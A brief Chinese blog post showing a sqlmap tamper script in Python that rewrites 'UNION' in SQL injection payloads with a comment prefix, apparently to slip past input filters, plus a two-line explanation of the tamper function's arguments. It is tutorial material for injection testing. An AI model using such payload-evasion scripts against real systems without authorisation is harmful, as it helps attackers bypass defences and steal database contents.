sqlmap tamper编写 

#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    payload = payload.replace('UNION','/*8888888888888UNION')
    print kwargs
    return payload

 

说明:

tamper 就是 sqlmap 注入的 payload

kwargs 是一些header 信息

 

posted on 2017-08-23 08:29  Perl6  阅读(824)  评论(0编辑  收藏  举报

导航